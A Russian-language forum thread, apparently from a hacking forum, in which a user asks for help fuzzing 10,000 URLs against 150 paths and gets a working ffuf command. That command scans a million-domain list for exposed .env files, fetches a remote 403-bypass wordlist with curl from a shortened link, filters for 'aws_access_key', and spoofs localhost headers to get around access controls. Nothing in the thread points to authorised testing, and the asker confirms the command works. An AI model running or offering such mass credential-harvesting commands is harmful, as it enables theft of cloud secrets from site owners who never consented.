• XSS.stack #1 – первый литературный журнал от юзеров форума

Мультифазинг или фаззинг с двумя списками

PrikolBullet

RAM
Забанен
Регистрация
23.05.2022
Сообщения
108
Реакции
16
Пожалуйста, обратите внимание, что пользователь заблокирован
Посоветуйтесь пожалуйста нормальный фазер, у меня уже было три попытки. Ни одна нормально у меня не работает (да да руки из жопы).
Задача: есть список urls и список директорий. По каждому url пройтись всеми директориями. Ссылок 10к, директорий 150.
Есть сервер с ssh с 4 Гб оперативной памяти и старый ноутбук с 8
Мои попытки:
1) цикл в цикле пайтон с библиотекой request.
if response.status_code == 200
Проблема: слишком много False-positive. Пробовал and <размер страницы> результат тот же
2) ffuf -w urls.txt:W1 -w files.txt:W2 -u W1/W2 -mc 200
Проблема: просто не работает с несколькими списками у меня, перепробовал уже три версии ffuf. Даже ошибку не выдает какую-либо
3) Burp Intruder Coaster Bomb. После 4 тысячной попытки берп у меня уходит в белый экран и ничего ему не помогает, не сохраняет готовый список при сбое
Заранее спасибо, хотя бы утилиту, команду сам подберу
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Стоит все таки доебать ffuf. Он спецом сделан для этого и у меня отлично бегает с несколькими списками
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Стоит все таки доебать ffuf. Он спецом сделан для этого и у меня отлично бегает с несколькими списками
Команда у тебя такая же, какую я привел ? Версия самая новая?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Команда у тебя такая же, какую я привел ? Версия самая новая?
что у меня работает прямо сейчас:
Код:
ffuf -w /Users/User/www/tmp/majestic_1m_env.txt:DOMAIN -w <(curl -slkSL bit.ly/env-403-bypass):ENV -u https://DOMAIN/ENV -r -mr "aws_access_key" -mc 200 -mmode and -H "X-Originating-IP:127.0.0.1" -H "X-Forwarded-For:127.0.0.1" -H "X-Remote-IP:127.0.0.1" -H "X-Remote-Addr:127.0.0.1" -H "X-Forwarded-Host:127.0.0.1" -H "X-Client-IP:127.0.0.1" -H "X-Host:127.0.0.1" -H "Forwarded:127.0.0.1" -H "X-Forwarded-By:127.0.0.1" -H "X-Forwarded-For-IP:127.0.0.1" -H "X-True-IP:127.0.0.1" -H "X-Real-IP:127.0.0.1"
Fuzz Faster U Fool - v1.3.1-dev
 
Пожалуйста, обратите внимание, что пользователь заблокирован
что у меня работает прямо сейчас:
Код:
ffuf -w /Users/User/www/tmp/majestic_1m_env.txt:DOMAIN -w <(curl -slkSL bit.ly/env-403-bypass):ENV -u https://DOMAIN/ENV -r -mr "aws_access_key" -mc 200 -mmode and -H "X-Originating-IP:127.0.0.1" -H "X-Forwarded-For:127.0.0.1" -H "X-Remote-IP:127.0.0.1" -H "X-Remote-Addr:127.0.0.1" -H "X-Forwarded-Host:127.0.0.1" -H "X-Client-IP:127.0.0.1" -H "X-Host:127.0.0.1" -H "Forwarded:127.0.0.1" -H "X-Forwarded-By:127.0.0.1" -H "X-Forwarded-For-IP:127.0.0.1" -H "X-True-IP:127.0.0.1" -H "X-Real-IP:127.0.0.1"
Fuzz Faster U Fool - v1.3.1-dev
Спасибо, топик можно закрыть, на твоей версии + правильный матч настроенный все заработало. Но все равно пропускает некоторые, сейчас дальше играться буду
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх